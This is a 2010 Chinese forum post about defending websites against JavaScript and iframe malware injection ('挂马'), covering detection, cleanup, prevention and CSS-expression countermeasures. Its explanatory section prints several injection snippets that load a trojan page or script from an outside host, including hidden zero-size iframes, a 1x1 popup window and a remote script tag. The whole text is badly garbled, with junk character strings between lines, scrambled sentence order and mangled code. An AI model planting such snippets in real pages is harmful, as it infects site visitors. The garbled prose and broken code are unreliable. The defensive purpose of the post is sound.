搜索
查看: 11473|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

4 c! @7 Z5 l/ R; }, C/ {

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

' d( O+ r8 M2 g a/ d

IFRAME 和 JS 脚本挂马。

( K* t/ s$ w0 G* q. Q y

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

. B8 V L. \: y# U* N) A

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

! r/ J1 d$ g% A3 u

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

, G/ m& y |/ K- S& p( P, d& I/ f3 L

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

/ O |, |0 K+ i/ ~

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

1 o' |3 i# s. F2 m* l9 i

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

& }+ A ]8 D% z& I3 p4 x

。一千多位会员的 ID

9 v! a1 O0 c8 o, Q z0 C O

2: 如何检测网页是否被挂马。

6 w4 S! Z b" o# g0 u

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

4 @$ Q! M, ]* A* h+ S

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

/ ^. J1 H+ ~' U, [8 Y( G

因素。
2 googl 检测。>

7 Z( S. g% u- c& i# Z6 X

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

; E6 e$ @# Y' L' A1 t

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

; w+ O7 A- H! Q! W; N& g

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

& o6 o# a {- Q$ t7 o

, x- x* h# s) }* K7 l/ y$ S

3: 如何清除网页木马。

& y) t, Q$ c/ j" }( J

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

( x9 A9 F! R, P. |, K- l

入源文件把相关的网页挂马种类的可疑代码删除。

$ h6 ]& A5 r. R$ D; B* z

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

7 w+ q) J9 r, I- P+ {

悉。>

7 S% [# r C% y7 q1 s/ i

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

, |* O. Y9 l8 X5 y

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

- \$ {( ]# g$ h

2 保证你所使用的顺序及时的更新。

; l' M) S& s. S

3 不要在前台网页上加注后台管理程序登陆页面的链接。

6 I7 {- S9 p3 ]& `9 x) N0 T

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

: j. M) p/ Q, I/ Z

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

. t' F& j' H" p7 n7 U% i

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

% }, {- x7 ]0 u

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

; H/ F8 i3 p5 x9 T; P

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

R7 [& J0 f$ x' r6 Z5 k1 o

' J; s8 Y# `8 w7 _/ Q+ r' p* H' @; u5 C0 Z

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

" N2 J, b: x' ]. @; g! c* s+ k" f4 M

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

: h$ L5 s4 v7 C* Q9 J+ J

JS 挂马溯源

i+ e2 o$ ~, g( H$ z A' y

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

% j, y! K u2 J; {

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

/ g$ u" M8 I4 ?0 z' l

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

" G) b/ Y% O1 d- `3 i# o) Z6 N( X2 u0 c# ~

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

3 x! H# g& n1 F' L9 m3 t1 `

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

. o# [0 t4 y" p* `

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

$ z8 k$ F2 h, C/ `/ z

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

: |% C3 B/ I4 k; a1 d- g4 V: v" e

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

2 V4 V; f" ]( @' E% K

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

3 a# j3 Y& }, J! I% {% b

脚本在工作中会有很大的协助。

9 n% H7 e) G8 {; P* M2 r! o

挂马原理一点通

: k; P5 o! Q+ {% S( D9 B% c# h: R

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

' q- \% a6 h' j+ r1 [2 i4 p, f

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

0 S* D4 M2 N* g/ ^$ ]$ C

无从区分木马在何处。

M! U! U) j1 X8 o0 ~

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

& g8 ^0 C5 G" h

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

: M2 N" w4 Q( U) W% e6 Y

容易蒙混过关,导致木马久杀不绝。

8 K0 c7 i1 o, H! C1 }, Z

JS 挂马攻防实录

/ ~/ F- J7 T2 U

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

- K( x) h; C% |& R; _: i" v

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

( `# k1 R% B7 }) I! H: H# f, ^# {

这种方法使用的关键代码如下:

5 H, W- A1 w5 R/ X, i* t* U9 f9 w w# A

"",  window.open "http://www.v404.cn/ 木马

5 l% j% J! ~( V$ y+ ?

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

}, @) P; I1 r" L6 N. w

Y0 b6 y' a( j: w) _3 e# _

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

) j5 i4 O5 w& X+ }

但是设置为 0 后,可能会出现恶意代码不运行的情况。

. f- g2 V5 f+ [/ s* _3 Y

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

6 ?! k9 f o+ G" v6 N$ `8 D( Y% f9 t

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

+ x* l* [6 M( |

9 u0 E3 w, [1 h3 x

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

r! w( T5 c& |5 P ]

; u6 z$ K3 r5 r* R

或者

9 f( K& z! R+ I' s8 k$ v1 T5 N

document.writ "<div style='display:none'>"

p+ T7 A9 f9 S0 Q

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

% v/ ~. U( W, E2 P9 x

document.writ "</div>"
 

" P! Z6 Z/ d1 b9 _. I

" F' |+ @& m/ l/ b/ Z1 T

就成功地将木马挂到对方的网页中了

+ u i, Z$ @5 N9 v6 k* a8 g) P

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

1 Z1 V: _7 O2 x

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

V7 b2 ^. E, d% i1 i

或者:

4 R( D. k: s- i: {4 ], Y1 f. F

<ifram src="vbscript:[ 挂马脚本 ]">

: A7 ?( i& S2 B) \

/ _$ e1 x# P, A( B! H


等等 …

- ?3 } k9 o( {

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

) N; N4 G' j' H* ?7 J$ n* [

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

# I' x( S# y) t

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

! G6 c4 F0 z6 ?* ^* P1 |% M5 T1 D+ M

;}

7 c0 N2 c; B0 U0 f. @1 @( o f

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

, ^2 P0 P2 j( m7 n: R' f- e( D& ?3 O

- R+ M# }4 M4 Z+ F9 j

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

$ Z" N* G6 `! e7 h, G0 i7 L

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

; J& {/ D- a. L( A# y3 _! q6 _

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

) j; J7 Q3 u0 w; T- d

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

* B3 j5 v) P3 v( q7 J0 R6 O

<title> 让 JS 挂马中止的 CSS 代码 </title>

8 c' v7 H+ Z6 |

<styl type="text/css" id="shudoo">

1 S: U; A. w" ~% T. d5 |: @; ]$ C- P

/*<![CDATA[*/

5 [+ W- x. n$ @7 n2 D

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

1 I: J6 f4 ]! H3 f

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

r$ L; `- S% X0 ]

/*]]>*/

: u4 H/ M7 p; E

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表